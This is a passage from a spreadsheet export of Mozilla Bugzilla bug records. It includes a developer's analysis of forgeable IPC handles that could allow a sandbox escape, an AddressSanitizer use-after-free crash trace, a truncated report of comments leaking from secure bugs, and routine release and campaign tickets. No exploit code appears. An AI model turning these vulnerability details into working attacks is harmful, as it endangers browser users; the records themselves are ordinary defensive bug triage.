The problem is that, if the hostile process can guess a `HANDLE` value valid for the destination process, it can send that instead and potentially gain access to resources it shouldn't have.  The Chromium bug gives some examples of how that could be a security problem in the context of graphics data, but there may be additional security implications for us, such as with `Endpoint`s.  (For Mach ports this affects shared memory but not `Endpoint`.)  I don't know how guessable `HANDLE`s or `mach_port_t`s are in practice.
In the general case, we'll need to send some kind of unforgeable token in place of the `HANDLE`, and have both ends communicate with the trusted third party (parent / sandbox broker) to transfer the actual handle.  The Chromium devs came to the same conclusion; [their design document][doc] explores some variations on this theme.
In the special case case of parent→child the parent has a process handle for the destination and can `DuplicateHandle` for real; for child→parent the child could send its own `HANDLE` and have the parent extract a copy.  These are optimizations and shouldn't be necessary for correctness.
In conclusion, this is a security issue whose severity is unknown but at most a complete sandbox escape (for the Windows version; maybe less severe for Mac), it's been publicly documented in another context for years now, and the best case for fixing it seems to be a major infrastructure change that we normally wouldn't want to uplift.
[doc]: https://docs.google.com/document/d/10OiW_YGxQsiTLaP1x3Yp0ymIEEJEBKqFPMVlFDdFZXk
[dup]: https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-duplicatehandle
[mach]: https://searchfox.org/mozilla-central/rev/22b330ecb3edba1536a54887060cbdd09db21c59/ipc/glue/SharedMemoryBasic_mach.mm#592-643</t>
        </is>
      </c>
      <c r="X5757" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5758">
      <c r="A5758" t="n">
        <v>1191810</v>
      </c>
      <c r="B5758" t="inlineStr">
        <is>
          <t>2015-08-06 06:49:42 -0700</t>
        </is>
      </c>
      <c r="C5758" t="inlineStr">
        <is>
          <t>MDN: Suggested Tiles - v4 (Original Creative)</t>
        </is>
      </c>
      <c r="D5758" t="inlineStr">
        <is>
          <t>2015-08-13 06:34:15 -0700</t>
        </is>
      </c>
      <c r="E5758" t="n">
        <v>1</v>
      </c>
      <c r="F5758" t="n">
        <v>1</v>
      </c>
      <c r="G5758" t="n">
        <v>6</v>
      </c>
      <c r="H5758" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5758" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J5758" t="inlineStr">
        <is>
          <t>Tiles</t>
        </is>
      </c>
      <c r="K5758" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5758" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5758" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5758" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5758" t="inlineStr"/>
      <c r="Q5758" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5758" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5758" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5758" t="n">
        <v>1</v>
      </c>
      <c r="U5758" t="n">
        <v>0</v>
      </c>
      <c r="V5758" t="n">
        <v>6</v>
      </c>
      <c r="W5758" t="inlineStr">
        <is>
          <t>Created attachment 8644322
MDN - Suggested Tile Creative.zip
Hey Nan,
Here is the original tile creative we are going back to for MDN. This is to go live on Tuesday August 11th. There is no end date for this campaign.
Campaign: MDN: Suggested Tiles - v4
Flight date: 8/11/2015-
Category: MozCat_Mozilla_Sites
Category Name: Mozilla
Cover Image: MDN_MozillaSites and WebDev_tile.png
Rollover Image: MDN_Roll-Over_Tile.png
URL: https://developer.mozilla.org/?utm_campaign=default&amp;utm_source=mozilla&amp;utm_medium=firefox-suggested-tile&amp;utm_content=MozCat_Mozilla_Sites
Campaign: MDN: Suggested Tiles - v4
Flight date: 8/11/2015-
Category: MozCat_WebDev
Category Name: Web Development
Cover Image: MDN_MozillaSites and WebDev_tile.png
Rollover Image: MDN_Roll-Over_Tile.png
URL: https://developer.mozilla.org/?utm_campaign=default&amp;utm_source=mozilla&amp;utm_medium=firefox-suggested-tile&amp;utm_content=MozCat_WebDev
Campaign: MDN: Suggested Tiles - v4
Flight date: 8/11/2015-
Category: MozCat_WebLearner
Category Name: Web Education
Cover Image: MDN_WebLearner_tile.png
Rollover Image: MDN_Roll-Over_Tile.png
URL: https://developer.mozilla.org/Learn?utm_campaign=default&amp;utm_source=mozilla&amp;utm_medium=firefox-suggested-tile&amp;utm_content=MozCat_WebLearner
Let me know if you have any questions.
~Storm</t>
        </is>
      </c>
      <c r="X5758" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5759">
      <c r="A5759" t="n">
        <v>704312</v>
      </c>
      <c r="B5759" t="inlineStr">
        <is>
          <t>2011-11-21 15:00:12 -0800</t>
        </is>
      </c>
      <c r="C5759" t="inlineStr">
        <is>
          <t>balrog (at aus4-dev.allizom.org) not serving partials?</t>
        </is>
      </c>
      <c r="D5759" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5759" t="n">
        <v>1</v>
      </c>
      <c r="F5759" t="n">
        <v>1</v>
      </c>
      <c r="G5759" t="n">
        <v>5</v>
      </c>
      <c r="H5759" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5759" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5759" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5759" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5759" t="inlineStr"/>
      <c r="Q5759" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5759" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5759" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5759" t="n">
        <v>1</v>
      </c>
      <c r="U5759" t="n">
        <v>0</v>
      </c>
      <c r="V5759" t="n">
        <v>6</v>
      </c>
      <c r="W5759" t="inlineStr">
        <is>
          <t>08:26 &lt;@catlee-away&gt; [13:36:52] bhearsum|afk: I've only been getting complete updates since switching over to the new balrog
08:26 &lt;@catlee-away&gt; [14:26:41] https://aus4-dev.allizom.org/update/3/Firefox/11.0a1/20111119031209/Linux_x86_64-gcc3/en-US/nightly/Linux%203.0.0-1-amd64%20%28GTK%202.24.7%29/default/default/update.xml
08:26 &lt;@catlee-away&gt; [14:26:45] gives me a complete
08:26 &lt;@catlee-away&gt; [14:27:02] https://aus3.mozilla.org/update/3/Firefox/11.0a1/20111119031209/Linux_x86_64-gcc3/en-US/nightly/Linux%203.0.0-1-amd64%20%28GTK%202.24.7%29/default/default/update.xml
08:26 &lt;@catlee-away&gt; [14:27:08] gets a partial</t>
        </is>
      </c>
      <c r="X5759" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5760">
      <c r="A5760" t="n">
        <v>1404016</v>
      </c>
      <c r="B5760" t="inlineStr">
        <is>
          <t>2017-09-28 10:12:48 -0700</t>
        </is>
      </c>
      <c r="C5760" t="inlineStr">
        <is>
          <t>Suspend Nightly updates on Windows due to bug 1403951</t>
        </is>
      </c>
      <c r="D5760" t="inlineStr">
        <is>
          <t>2017-09-29 03:38:17 -0700</t>
        </is>
      </c>
      <c r="E5760" t="n">
        <v>1</v>
      </c>
      <c r="F5760" t="n">
        <v>1</v>
      </c>
      <c r="G5760" t="n">
        <v>5</v>
      </c>
      <c r="H5760" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5760" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5760" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K5760" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5760" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5760" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5760" t="inlineStr"/>
      <c r="Q5760" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5760" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5760" t="n">
        <v>1</v>
      </c>
      <c r="U5760" t="n">
        <v>0</v>
      </c>
      <c r="V5760" t="n">
        <v>7</v>
      </c>
      <c r="W5760" t="inlineStr">
        <is>
          <t>Bug 1403951 is making Nightly unusable on Windows. 
eg: Restart the browser after it updates to today's nightly, and then the browser window does not appear at all, only the taskbar icons.
Until that's fixed (or backed out) please could Nightly updates be suspended on Windows. (Or everywhere if per-platform is a pain).
Thanks!</t>
        </is>
      </c>
      <c r="X5760" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5761">
      <c r="A5761" t="n">
        <v>771873</v>
      </c>
      <c r="B5761" t="inlineStr">
        <is>
          <t>2012-07-07 23:12:39 -0700</t>
        </is>
      </c>
      <c r="C5761" t="inlineStr">
        <is>
          <t>Heap-use-after-free in RangeData::~RangeData</t>
        </is>
      </c>
      <c r="D5761" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:09 -0700</t>
        </is>
      </c>
      <c r="E5761" t="n">
        <v>1</v>
      </c>
      <c r="F5761" t="n">
        <v>1</v>
      </c>
      <c r="G5761" t="n">
        <v>3</v>
      </c>
      <c r="H5761" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5761" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5761" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K5761" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5761" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5761" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5761" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5761" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q5761" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5761" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5761" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T5761" t="n">
        <v>1</v>
      </c>
      <c r="U5761" t="n">
        <v>0</v>
      </c>
      <c r="V5761" t="n">
        <v>37</v>
      </c>
      <c r="W5761" t="inlineStr">
        <is>
          <t>Created attachment 640025
Testcase
Reproduces on trunk
20120707214206
http://hg.mozilla.org/mozilla-central/rev/9533b40ff28b
=================================================================
==25564== ERROR: AddressSanitizer heap-use-after-free on address 0x7f1cf1264780 at pc 0x7f1d2220e700 bp 0x7fffcdd81470 sp 0x7fffcdd81468
READ of size 8 at 0x7f1cf1264780 thread T0
    #0 0x7f1d2220e700 in ~nsRefPtr firefox/src/../../dist/include/nsAutoPtr.h:874
    #1 0x7f1d221a42b3 in ~nsRefPtr firefox/src/../../dist/include/nsAutoPtr.h:875
    #2 0x7f1d2288b4d3 in RangeData::~RangeData() firefox/src/../../dist/include/mozilla/Selection.h:24
    #3 0x7f1d227ea3b3 in RangeData::~RangeData() firefox/src/../../dist/include/mozilla/Selection.h:24
    #4 0x7f1d228838e3 in nsTArrayElementTraits&lt;RangeData&gt;::Destruct(RangeData*) firefox/src/../../dist/include/nsTArray.h:349
    #5 0x7f1d228823be in nsTArray&lt;RangeData, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) firefox/src/../../dist/include/nsTArray.h:1210
    #6 0x7f1d22852ab7 in nsTArray&lt;RangeData, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) firefox/src/../../dist/include/nsTArray.h:932
    #7 0x7f1d2283db0d in mozilla::Selection::AddItem(nsRange*, int*) firefox/src/layout/generic/nsSelection.cpp:3535
    #8 0x7f1d228674fe in mozilla::Selection::AddRange(nsIDOMRange*) firefox/src/layout/generic/nsSelection.cpp:4414
    #9 0x7f1d2b8c58db in mozInlineSpellChecker::AddRange(nsISelection*, nsIDOMRange*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1600
    #10 0x7f1d2b8c2d1d in mozInlineSpellChecker::DoSpellCheck(mozInlineSpellWordUtil&amp;, nsISelection*, mozInlineSpellStatus*, bool*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1399
    #11 0x7f1d2b8c70f1 in mozInlineSpellChecker::ResumeCheck(mozInlineSpellStatus*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1488
    #12 0x7f1d2b8cf9dc in mozInlineSpellResume::Run() firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:462
    #13 0x7f1d2d045ccd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #14 0x7f1d2ccd501d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #15 0x7f1d2bd76226 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #16 0x7f1d2d2f984a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #17 0x7f1d2d2f9693 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #18 0x7f1d2d2f9578 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #19 0x7f1d2b2ae42e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #20 0x7f1d29ef9668 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #21 0x7f1d20736280 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #22 0x7f1d2073cc22 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #23 0x7f1d207400f2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #24 0x40c28f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #25 0x409cbd in main firefox/src/browser/app/nsBrowserApp.cpp:330
    #26 0x7f1d3b388c4d in ?? ??:0
0x7f1cf1264780 is located 0 bytes inside of 64-byte region [0x7f1cf1264780,0x7f1cf12647c0)
freed by thread T0 here:
    #0 0x4a4392 in free ??:0
    #1 0x7f1d382165c3 in moz_free firefox/src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f1d23d7e6c6 in ~nsRange firefox/src/content/base/src/nsRange.cpp:215
    #3 0x7f1d23d82997 in nsRange::Release() firefox/src/content/base/src/nsRange.cpp:258
    #4 0x7f1d2220e6a0 in ~nsRefPtr firefox/src/../../../dist/include/nsAutoPtr.h:874
    #5 0x7f1d221a42b3 in ~nsRefPtr firefox/src/../../../dist/include/nsAutoPtr.h:875
    #6 0x7f1d2288b4d3 in RangeData::~RangeData() firefox/src/../../dist/include/mozilla/Selection.h:24
    #7 0x7f1d227ea3b3 in RangeData::~RangeData() firefox/src/../../dist/include/mozilla/Selection.h:24
    #8 0x7f1d228838e3 in nsTArrayElementTraits&lt;RangeData&gt;::Destruct(RangeData*) firefox/src/../../dist/include/nsTArray.h:349
    #9 0x7f1d228823be in nsTArray&lt;RangeData, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) firefox/src/../../dist/include/nsTArray.h:1210
    #10 0x7f1d22852ab7 in nsTArray&lt;RangeData, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) firefox/src/../../dist/include/nsTArray.h:932
    #11 0x7f1d2283db0d in mozilla::Selection::AddItem(nsRange*, int*) firefox/src/layout/generic/nsSelection.cpp:3535
    #12 0x7f1d228674fe in mozilla::Selection::AddRange(nsIDOMRange*) firefox/src/layout/generic/nsSelection.cpp:4414
    #13 0x7f1d2b8c58db in mozInlineSpellChecker::AddRange(nsISelection*, nsIDOMRange*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1600
    #14 0x7f1d2b8c2d1d in mozInlineSpellChecker::DoSpellCheck(mozInlineSpellWordUtil&amp;, nsISelection*, mozInlineSpellStatus*, bool*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1399
    #15 0x7f1d2b8c70f1 in mozInlineSpellChecker::ResumeCheck(mozInlineSpellStatus*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1488
    #16 0x7f1d2b8cf9dc in mozInlineSpellResume::Run() firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:462
    #17 0x7f1d2d045ccd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #18 0x7f1d2ccd501d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #19 0x7f1d2bd76226 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #20 0x7f1d2d2f984a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #21 0x7f1d2d2f9693 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #22 0x7f1d2d2f9578 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #23 0x7f1d2b2ae42e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #24 0x7f1d29ef9668 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #25 0x7f1d20736280 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #26 0x7f1d2073cc22 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #27 0x7f1d207400f2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #28 0x40c28f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #29 0x409cbd in main firefox/src/browser/app/nsBrowserApp.cpp:330
previously allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f1d38216717 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f1d2b8dc0e3 in mozInlineSpellWordUtil::MakeRange(mozInlineSpellWordUtil::NodeOffset, mozInlineSpellWordUtil::NodeOffset, nsRange**) firefox/src/extensions/spellcheck/src/mozInlineSpellWordUtil.cpp:322
    #3 0x7f1d2b8d9fc6 in mozInlineSpellWordUtil::MakeRangeForWord(mozInlineSpellWordUtil::RealWord const&amp;, nsRange**) firefox/src/extensions/spellcheck/src/mozInlineSpellWordUtil.cpp:226
    #4 0x7f1d2b8dee62 in mozInlineSpellWordUtil::GetNextWord(nsAString_internal&amp;, nsRange**, bool*) firefox/src/extensions/spellcheck/src/mozInlineSpellWordUtil.cpp:297
    #5 0x7f1d2b8c1906 in mozInlineSpellChecker::DoSpellCheck(mozInlineSpellWordUtil&amp;, nsISelection*, mozInlineSpellStatus*, bool*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1317
    #6 0x7f1d2b8c70f1 in mozInlineSpellChecker::ResumeCheck(mozInlineSpellStatus*) firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:1488
    #7 0x7f1d2b8cf9dc in mozInlineSpellResume::Run() firefox/src/extensions/spellcheck/src/mozInlineSpellChecker.cpp:462
    #8 0x7f1d2d045ccd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #9 0x7f1d2ccd501d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #10 0x7f1d2bd76226 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #11 0x7f1d2d2f984a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #12 0x7f1d2d2f9693 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #13 0x7f1d2d2f9578 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #14 0x7f1d2b2ae42e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #15 0x7f1d29ef9668 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #16 0x7f1d20736280 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #17 0x7f1d2073cc22 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #18 0x7f1d207400f2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #19 0x40c28f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #20 0x409cbd in main firefox/src/browser/app/nsBrowserApp.cpp:330
    #21 0x7f1d3b388c4d in ?? ??:0
==25564== ABORTING
Stats: 156M malloced (189M for red zones) by 464984 calls
Stats: 41M realloced by 20345 calls
Stats: 112M freed by 231687 calls
Stats: 0M really freed by 0 calls
Stats: 376M (96306 full pages) mmaped in 94 calls
  mmaps   by size class: 8:393192; 9:49146; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:176; 19:48; 20:16;
  mallocs by size class: 8:376983; 9:47309; 10:16409; 11:17335; 12:2458; 13:1841; 14:1416; 15:336; 16:562; 17:116; 18:165; 19:41; 20:13;
  frees   by size class: 8:163249; 9:36760; 10:12958; 11:14054; 12:1531; 13:948; 14:1228; 15:278; 16:474; 17:101; 18:58; 19:38; 20:10;
  rfrees  by size class:
Stats: malloc large: 335 small slow: 2084
Shadow byte and word:
  0x1fe39e24c8f0: fd
  0x1fe39e24c8f0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe39e24c8d0: fd fd fd fd fd fd fd fd
  0x1fe39e24c8d8: fd fd fd fd fd fd fd fd
  0x1fe39e24c8e0: fa fa fa fa fa fa fa fa
  0x1fe39e24c8e8: fa fa fa fa fa fa fa fa
=&gt;0x1fe39e24c8f0: fd fd fd fd fd fd fd fd
  0x1fe39e24c8f8: fd fd fd fd fd fd fd fd
  0x1fe39e24c900: fa fa fa fa fa fa fa fa
  0x1fe39e24c908: fa fa fa fa fa fa fa fa
  0x1fe39e24c910: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X5761" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5762">
      <c r="A5762" t="n">
        <v>1467412</v>
      </c>
      <c r="B5762" t="inlineStr">
        <is>
          <t>2018-06-07 02:51:10 -0700</t>
        </is>
      </c>
      <c r="C5762" t="inlineStr">
        <is>
          <t>"TypeError: $.post(...).done(...).error is not a function" when trying to reprocess a crash</t>
        </is>
      </c>
      <c r="D5762" t="inlineStr">
        <is>
          <t>2018-06-08 16:28:18 -0700</t>
        </is>
      </c>
      <c r="E5762" t="n">
        <v>1</v>
      </c>
      <c r="F5762" t="n">
        <v>1</v>
      </c>
      <c r="G5762" t="n">
        <v>4</v>
      </c>
      <c r="H5762" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5762" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5762" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5762" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5762" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5762" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5762" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5762" t="inlineStr"/>
      <c r="Q5762" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5762" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5762" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5762" t="n">
        <v>1</v>
      </c>
      <c r="U5762" t="n">
        <v>0</v>
      </c>
      <c r="V5762" t="n">
        <v>4</v>
      </c>
      <c r="W5762" t="inlineStr">
        <is>
          <t>After hitting on "Reprocess this crash", a spinner appears with the "Sending crash ID in for reprocessing..." text. Then "Success!" appears, but the spinner is still there.
I see "TypeError: $.post(...).done(...).error is not a function" in the console.</t>
        </is>
      </c>
      <c r="X5762" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5763">
      <c r="A5763" t="n">
        <v>602704</v>
      </c>
      <c r="B5763" t="inlineStr">
        <is>
          <t>2010-10-07 16:06:58 -0700</t>
        </is>
      </c>
      <c r="C5763" t="inlineStr">
        <is>
          <t>Requesting cancel of try 08b4f96c3eb1</t>
        </is>
      </c>
      <c r="D5763" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5763" t="n">
        <v>1</v>
      </c>
      <c r="F5763" t="n">
        <v>1</v>
      </c>
      <c r="G5763" t="n">
        <v>5</v>
      </c>
      <c r="H5763" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5763" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5763" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5763" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5763" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5763" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5763" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5763" t="inlineStr">
        <is>
          <t>tryrequest</t>
        </is>
      </c>
      <c r="Q5763" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5763" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5763" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5763" t="n">
        <v>1</v>
      </c>
      <c r="U5763" t="n">
        <v>0</v>
      </c>
      <c r="V5763" t="n">
        <v>2</v>
      </c>
      <c r="W5763" t="inlineStr">
        <is>
          <t>The run is no longer needed.</t>
        </is>
      </c>
      <c r="X5763" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5764">
      <c r="A5764" t="n">
        <v>287880</v>
      </c>
      <c r="B5764" t="inlineStr">
        <is>
          <t>2005-03-26 21:11:08 -0800</t>
        </is>
      </c>
      <c r="C5764" t="inlineStr">
        <is>
          <t>Comments on secure bugs still available to templates... show_bug leaks</t>
        </is>
      </c>
      <c r="D5764" t="inlineStr">
        <is>
          <t>2005-03-30 06:36:43 -0800</t>
        </is>
      </c>
      <c r="E5764" t="n">
        <v>1</v>
      </c>
      <c r="F5764" t="n">
        <v>1</v>
      </c>
      <c r="G5764" t="n">
        <v>4</v>
      </c>
      <c r="H5764" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5764" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5764" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5764" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L5764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5764" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5764" t="inlineStr"/>
      <c r="Q5764" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5764" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5764" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5764" t="n">
        <v>1</v>
      </c>
      <c r="U5764" t="n">
        <v>0</v>
      </c>
      <c r="V5764" t="n">
        <v>13</v>
      </c>
      <c r="W5764" t="inlineStr">
        <is>
          <t>In bug 287109, a strangeness was pointed out...
In show_bug.cgi, the history of comments IS AVAILABLE even if the bug
is not, so long as we are in the "long format" mode.  So, if you hack form data,
